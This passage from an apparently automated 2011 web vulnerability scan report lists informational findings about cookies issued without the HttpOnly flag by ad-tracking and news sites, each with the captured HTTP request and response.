l0r5000000033f010m0plkkxrb000000073f010m40lkkxrb000000073f010mjelkkxrb000000073f0112qnlkkplt0000000c3f01167blkl0r5000000033f010bo8lkb5u20000000l3f011393lkncox000000013f0114xolkncox000000013f010mjjlkl0r5000000033f011672lkkxrb000000073f010lw5lkb5u20000000l3f0116avlkncox000000013f010zaalkb5u20000000l3f011203lkb5u20000000l3f0115rmlkncox000000013f01163clkncox000000013f01137rlkkpqq0000000a3f011204lkkyy0000000063f01137qlkb5u20000000l3f0114j9lkncox000000013f010afqlkb5u20000000l3f010o0vlkkpqx000000093f0114ozlkncox000000013f0114bzlkncox000000013f010z2ilkkxrb000000073f0113ovlkncox000000013f010ni1lkb5u20000000l3f01; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: sglst=2280s9k1lkncox000000013f010j01501arllkncox000000013f010j01501dsolkncox000000013f010j015019rslkkpke02n4j00f3f010j0f50fam5lkkxr8002zw0083f010j08508cd4lkncox000000013f010j01501c6rlkncox000000013f010j01501d9dlkncox000000013f010j01501crhlkncox000000013f010j01501cy4lkncox000000013f010j015018wulkncox000000013f010j01501aoplkb5u209jqc0063e000j005008dklkncox000000013f010j01501cnxlkncox000000013f010j01501aoilkncox000000013f010j01501bvplkncox000000013f010j015018stlkncox000000013f010j01501942lkb5u20c6uv00k3e000j005008ndlkb5u20c6uv00k3e000j005009uklkncox000000013f010j01501bvdlkncox000000013f010j01501c5glkncox000000013f010j0150156blkb5u20c6uv00k3e000j00500cdvlkncox000000013f010j01501bjrlkncox000000013f010j01501asulkb5u209jqc0063e000j00500dcglkncox000000013f010j01501crplkncox000000013f010j015016enlkncox000000013f010j01501dcnlkncox000000013f010j01501asqlkncox000000013f010j015018k2lkncox000000013f010j015018gflkncox000000013f010j01501dc3lkncox000000013f010j01501c60lkncox000000013f010j015017pdlkncox000000013f010j01501d27lkncox000000013f010j01501ceqlkncox000000013f010j01501cstlkncox000000013f010j01501720lkncox000000013f010j0150180slkncox000000013f010j01501c80lkb5u209jqc0063e000j00500ag2lkd7nq0a51700k3f010j0h50hc1elkncox000000013f010j01501c81lkkpke02n4j00e3e000j00500a6slkkpke02n4j00e3e000j00500dnalkncox000000013f010j015019z6lkncox000000013f010j015019q4lkncox000000013f010j015010kllklhm4000000023f010j025029gslkncox000000013f010j01501b3zlkncox000000013f010j015019q5lkb5u20c6uv00k3e000j005005nklkncox000000013f010j015019mjlkncox000000013f010j01501dgflkkpke02n4j00f3f010j0f50f0t7ljyxb40ofdt00s3f010j0h50hbo0lkb5u20c6uv00l3f010j0h50h9pilkncox000000013f010j01501bo1lkkyy002dqx0053e000j00500c8glkncox000000013f010j01501d86lklhm401v2t0013e000j00500cwalkncox000000013f010j01501dqmlkncox000000013f010j01501dg4lkncox000000013f010j01501d84lkncox000000013f010j015019c9lkncox000000013f010j01501719lkb5u20c6uv0073f010j0250271alkkpke02n4j00e3e000j00500dgilkb5u209jqc0063e000j00500d3dlkncox000000013f010j015014wclkb5u20c6uv0073f010j02502a0ulkncox000000013f010j015015mrlkb5u20c6uv00l3f010j0h50h8eklkkpke02n4j00e3e000j005008ejlkncox000000013f010j015015jilkncox000000013f010j01501bwjlkkyy002dqx0063f010j06506dnklkncox000000013f010j015019gflkncox000000013f010j01501; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1280694&id=1277220&id=1277246&id=1272897&id=1266306&id=1265429&id=1265045&id=1264304&id=1261149&id=1261510&id=1259052&id=1258217&id=1256778&id=1256769&id=1256838&id=1256592&id=1247538&id=1246219&id=1242596&id=1230500
Content-Length: 0
Date: Wed, 04 May 2011 01:12:33 GMT


15.87. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.truewoman.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.truewoman.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D1369&ref=http%3A%2F%2Fwww.truewoman.com%2F&o1bgp HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 313
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 04 May 2011 01:12:31 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 03 Jun 2011 01:12:31 GMT; Path=/
Set-Cookie: di=%7B%7D..1304471551.1FE|1304471551.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 17:01:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 04 May 2011 01:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:31 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

15.88. http://news.cnet.com/webware/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.cnet.com
Path:   /webware/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware/ HTTP/1.1
Host: news.cnet.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; topTechNews=0; __csv=6522d442e56f04a6|0; wsFd=true; arrowFdCounter=-1; arrowLrps=1303941361935; arrowLat=1303946351887; arrowSpc=7; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:50 GMT
Via: HTTP/1.0 phx1-rb-cnetnews-app1.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 04 May 2011 01:30:51 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Age: 119
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowLrps=1303946351887:1303941361935; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowLat=1304472530240; domain=.cnet.com; path=/; expires=Thu, 03-May-2012 01:28:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 03-Jun-2011 01:28:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 02:28:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:28:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 04-May-2011 01:29:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 117262

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Webware - Cool Web apps for everyone - CNET</title> <meta
...[SNIP]...

15.89. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Wed, 04 May 2011 01:28:57 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Version=1; Domain=".brilig.com "; Max-Age=946080000; Expires=Fri, 26-Apr-2041 01:28:57 GMT
X-Brilig-D: D=6841
Content-Length: 0
Connection: keep-alive


15.90. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fnews.cnet.com%2Fwebware%2F&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.60%20safari%2F534.24&x=1304490536710&c=0&t=0&v=6522d442e56f04a6&m=0&cp0=LcGErAoOYI4AAGp4RtMAAAIs&cp1=Cg8JIk24ijttAAAASDs HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Tue, 02 Aug 2011 01:29:04; Path=/
Content-Length: 8000
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

15.91. http://pix04.revsci.net/K05540/b3/0/3/1003161/695265068.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05540/b3/0/3/1003161/695265068.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05540/b3/0/3/1003161/695265068.js?D=DM_LOC%3Dhttp%253A%252F%252Fnews.cnet.com%252Fwebware%252F%253Fsite%253D109%2526ncat%253D17939%25253A%2526ptype%253D8300%2526os%253D%252520%2526_rsiL%253D0%26DM_EOM%3D1&C=K05540 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SEJaSpn5l5JKLO/U2zMplZx83H/bTC237PZPP4jQ9v2WwWS5cZka6FAtm4beqRWw/7FAzLkWXPgIi9Fdj34GJWiNsniOfS7N83ZJCMm7XF401Ak8vWIo3drFxdzUB2XmgOG9ISdXu2T5qiaUXtX5k07+zndetYCXU8uC6WDdbPbEoqZPrF3A8T56voczKp5HJXWppbAhBOpR1Q3V+n/B2dTNvVt6bTFoSl77GnSK+qm0rWdXpvZj5nqF2cft+CWWWDuF/5dASzKewgNKgf7RGFOPCpManPIHMt+4GfyeyPj5zfWNagNFpEckaIJcjc/Ype13DXWWJ+NDW6eNgR8bMyM9Zyz072r8TEAb4Q6wuCg6JC9maofi7MA7OH6/NLciMiiWIPt8V3CxjGnvuXNCsiiDDRDBsuvovIfC96g8LjpthMERi2dozqvhqKIWEsI/+jjOokTawe+rOS60DvuFWr7xsmQPQ+SwE6r+YYXbd3vWeDASYs3zZtgvziWdAwte9TTiQBZeQXMTcL+DH9/78GPE9gQXBY8H1yIDrQ2D68pY3wJmxiV81hz8iDIvqb3GO8EGeZm4kkirwWY1y48ApPVV3IiooXmVPD/xqlUB3XTtm74uulyjk3u6tiKLhMW/7hI0e/jJ17wGo+jgDKCuhaLWdBFwJUWwRWx/BfDZPZrSBLyd5E2jsyn0CtLepyVG2cd1tG1FInaSzBIckUsUbtgraQxhFODw8c0zBy7NOpwEDbGlzNg706flbCLyeANNyYedL1yZOFdplAJIgatt1S4HP6ZgoTEYK06y5+Np0yeHwjqX8uABNrJoH64bFZ8dY9PUtvCG6BNUp/4TINt6lfLnHCBk6Lq5CsUWRP/xPHGguJgxph+ru1g39Q9ELp+QH5J+Y6GoagCsKnJ1mVojp2RB2SwpbIaUPj4Hs9GDc9gUII4rbh4UJH2lmuKuIsMiheOLb6nsyiPGG0fkLn69U3w9lYopzQ9ulijnNkB2BmMz47lmgqJGWZfpzEcQPnUHkt8ubqpZp+ZvSRL1RdIFxVDS0n6A5NHnEWA9Tfhcb4v2tm38busuHAMXI39qv+Ulc4Qmd00nAJFaOb+UJSeHqTI6MD0faH5M2yZGoe/nbCt/+tX3tqNs1zPSmFTZokZkGS09goch/NIwev3f+oHX4J0WMaqS9PKtP8lO8hGdDnAvJppuoB9kTbXAKSD8Fdvn5/0kdBF0xzfU0wKy+lLEkHo5MA04LnHERHrjGPOyYwO; rsi_segs_1000000=pUP15E+BiXIMpzbvRoNY5K4WCE6libZDfViB4H9IvrTgu3a8SAYliDuqRNz2X2BRF3fyy1xVRhGFTmO/fPXiS+0D0CQb33NaZk9PJrifH4iI8SZ3NaFAIUgEOtF7ShhBBzwIRzG8ZzX0QiXR711ecIBc97bH+CzAFUPlmr5AsvICNOFljjN4yoq+qmuVtPv2y8PxcG37h5Ye3ytyRbi38v2yyUTyxrrtj2MvmKxmsDS94nTOSjW6yhvUIXvD7XhJU7W6Y5MyZ35LTh5LAh0Q9PExcAjngY/XokZ5EhcVerk/VDBkR/tN2lrFHxJdpOhNQ29rOfHpnxk/Hu93KXG34ORuQS1IPEIIIGZyKWrSWnaI88MnVv9Sl3lfM0MOYJbK2NkahfwUvdnqg022b6Uio9SZPx03LjNAkItc8fBHYMQWkauU+vYvuTQmZjSMS9jhLMg6tV9RaqS/9zLrug9Z/P1mNscPbko=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de3fc9c&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbcf032&271d956a153787d6fee9112e9c6a9326; rtc_b3Fk=MLsHtzE1ZwprJpGrFhi4hKsp9SpKJjTHfY84CPYdGNEAVThHYM/F8EvK1KuXOWi3hDGoGlklVqD0zN4511BmlDEpLq7lwE0E9BI6f7LWbCSnU7k4gwwQW/9Jd4ievI5czRK32xT6rpDAOJefHMxDM9HZKWLe7J1MM8U7ohi7hEw9kdOspj9vDcN5sTt9SOwMMQoVXDIoXZN5wN+j1HcVS6vx+boZYJm66CsbRePLEh9tfG5+e9b5dbXzIM0W+GrfKajMaZGA1TjWA3CudqXRV5leHu0wUEKddVKXFMpQd2OqNucN1rq3aZgW4gPrhQwRe1pwMfLa7w7GHOUTWMXeW6IGudbQxCFYp/NHFUgc4JwWY3rdy8h1O7dAzPdLO6udIMesIC0/GkSRORgM35f/czrp53pn0oJCgkslqIHrwbgml5qdhVsbpR2Jv3CFnD6JSZT0PIYfCVUIIKv59LTsB5fieVPipsQ9SWmM8XGZ7nbfGTeRpsTHqYiLGamBl6vblHTinIHoAz7wl0thtPZJuEZAiH31SzTb1wzplVTTfHLEtxv8x/m0+sd3aacJTqzvcaz5Ip5yLdtVkaT7lwrKEBx5DISrNNtotRCzT9FXkWZYhjsq+/R0fv70XY8cfHHQ3BNtqzcdsFExW2APG+uYGGiR8dyx8aDnGuoT8HWa+vM1+oCrIAO4+U1IoVydaZ81CmmhmFsqHaLWU3VdKBKAGmTBXWGGHezSJpelIAMXuT76ivBvO9u0Q5WjMt3yg/kpgzrKrZRpRWasK/cG994Vl3afW6aBVULL2PYmFUCFSSkmWz6dWaSLvc8Kjg+xD5MjFEC6vQvRH5vNBGA/pwSwa/fJDhHKAl1btpaFPjPyumzSvyjS3tX0EpazrGuMjeZ/at2Zv/FUxiMdFJByxjPJ0J0RH5UEOqysjl9N+mkURT8IrZDO/Ao6fXukmf9bjieM5KE2/j5RVFQNUVJ/25RZwhOZ9xPJFdijL4Aaiz1SFj+WphXs3GKQZNW1GuO1Lc5Q8AR7RtT+6/b7qGkWXS8uxPHSEaXKyJhXeVsslXULN4phmlBcL5nSXOGTU515y7eStbwJ/J7gX3vZb/+0DLzdhKgHOxSJK1q0hQrybjB3JBdHtUytsqjCexwhGUpxjlv1qHuZkGZagSv6GiLY/X3m4Qp+H7MW+rMqTMt7+0ARhxGtSC6M06ahWZT90JUK5tfjSsYkxmkzhJMPiq2lCjriOlo/yVHxt0wsl12QUj+CHt/ILRuCwfQqh8HEc+s0mdl7UFJEMtCwDantmOufFw1KGkfiGzutO4NcmH9pxHzQUu4oMXdEJd1wqYvpmg5BmRp3yH+c4w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_b3Fk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95E+BsQIMp6b81ub+F6ivI6EAcKRa4TENR/hr6K55H6e0BpEFdTdR6IcU5PgEBVBKu7/EKGLpG0U9bK4TAA1PL7WMlNEKEG8V8HUP+XrItXAAcZ3g4WmmEVZ1mdDg+7ntoFBkData0eijREHGJIcKrOf05EaYkG6ZUrvN2cfnJjMCav/RH/4vDnoJ7MHeDWl3j1vVhsgb5DOoKh0wwiFmNdBAZ8JPeSlBJCbLWJeHgXMBtHa5AWqwTeUzeeIA0m+DF6kMAChgvkYLXXOqjI7A0Zeg3MUa2G7dKzMpWfSePSwFjHMLsoa9UqS9sY/XEPkvg82tXjUwLMfx/t0BX0w9lAnKqVlV0LYVLYnWt4Wl48/IZ3mgx+u4hMyarpNwxRLTEyO+vjusuvFUALw56p8jpKbTNONsZao2lsmoE3yJb3/cQkbxxAynruecgBZ8XEuQmzTFfOgVKSO/JPvu+PNNWiDNJ9C8f/ZT/Ks=; Domain=.revsci.net; Expires=Thu, 03-May-2012 01:28:58 GMT; Path=/
Set-Cookie: NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595da&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Wed, 01-Jun-2011 01:28:58 GMT; Path=/
Set-Cookie: rtc_xqZ4=MLsPtzE1JhpnJ5HLbtednoi0nCpKJlQQWwKX1s/hvto2CE2GUWSJvSl52PQqi52JpBK4GnVp9CADUVhC8UihMt47Kyqg5IhBs75AaGyI4DYeLzjpC3rGpxqcvluEW5RAzB7ukfIPR4OGlzUZaYCGAvr17sdnY7AbTj6bR8m0lkMpWQitVrl6tCXz9Dh8I00+4Uhv+5KZehhO7J1Fdf8+QBBQieU5F8S8bbaNk5nC4l37+T5FikDtiyevFoAx5NrjUqt3UbgM/vc0QAjVaq7FwKjOT09N86ggJ1piz3sJu2MfTd4RaLdhzRHVkggW/iopdcYYYAt/RfWuturE1q1oTvinK65+N/x2hab9/eP0oWcsum2hzuxAeqHtHg3b+tGIws0eS5gTLLy/M0X9T4Ga2YGkr7Imsq72334mpsJU3ITPD15sED3jjgsoo5PQVhoxccYWTZtOhtZD//kWYdVag2XS/aNF2czvTVdY41ak6VvAIID5L72S5YZx8I9eb1iG2qUtCebgX126P8fKKx3NDq3+3y4OBSqA4P/vlFZNkmOLKZlG7NBuMfxhK3/utr4v4+oot+42eGJ6U3VIFmS8vGMVtyqElhDe1yXccYYba1Jf+JZuqU/G8kyYkZOW3gYusdENbwrr1I4iY0fqmb57UjMxhLxWKtL9dI4ieIVOkYPk5TTpNwtvewgk25Rbg8EBpUkI4o4ewEOuV9VDDOZTmipJnobSmVfIAW+Y1nrV3CphE/vWKTOY2ZSh/4exB+QcPhfdeYDIbXAzqBjvAG+G1ovPHCoemWENb8p82N1Z/B4syGvLxUyDS35Q8NuZkCpMX7PvWN7XeA3SA/gKz/PNzojFZMg8t42QL1p47Onf24+Cy8y8vBfYSyiEt